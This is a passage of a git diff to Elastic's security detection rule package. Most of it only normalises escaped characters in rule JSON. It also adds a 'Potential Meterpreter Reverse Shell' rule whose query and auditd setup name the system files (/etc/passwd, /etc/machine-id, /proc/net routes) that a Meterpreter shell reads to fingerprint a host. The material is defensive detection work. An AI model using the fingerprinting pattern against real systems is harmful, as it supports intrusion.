be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json index 2a329d3d91a..288f1aeaf33 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json index 6df80c141c9..7ad60bee59b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json index bf422e750ca..0730d51188e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json index ed371d03d4b..bb63dfacfab 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json index ab57c78fb2b..98b6d11852d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json b/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json index 40867d89358..edf6cab8f48 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json index fab4516a05e..c98459da16e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Meterpreter Reverse Shell", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sample by host.id, process.pid, user.id\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json index cfa37ceb871..6b4ad1b8f91 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json index c87c0c9e60b..a1af6004224 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json new file mode 100644 index 00000000000..40351d476db --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Meterpreter Reverse Shell", + "query": "sample by host.id, process.pid, user.id\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "5c895b4f-9133-4e68-9e23-59902175355c_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json index e49ed32ce6a..e5b414a383a 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json index ff5a3d59b91..b6c7ab2af7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json index 84d3d02614f..01a47f604a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json index 4f98d6e191e..c6984413617 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json index 6fd6601f614..37e7d355f92 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json index 54ffdf38382..6aa392a4007 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json index ec5593c817a..c14255aa33c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json index 0228361641a..18fba24e14a 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json index dc7a603ab8b..8397b7c0cc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", 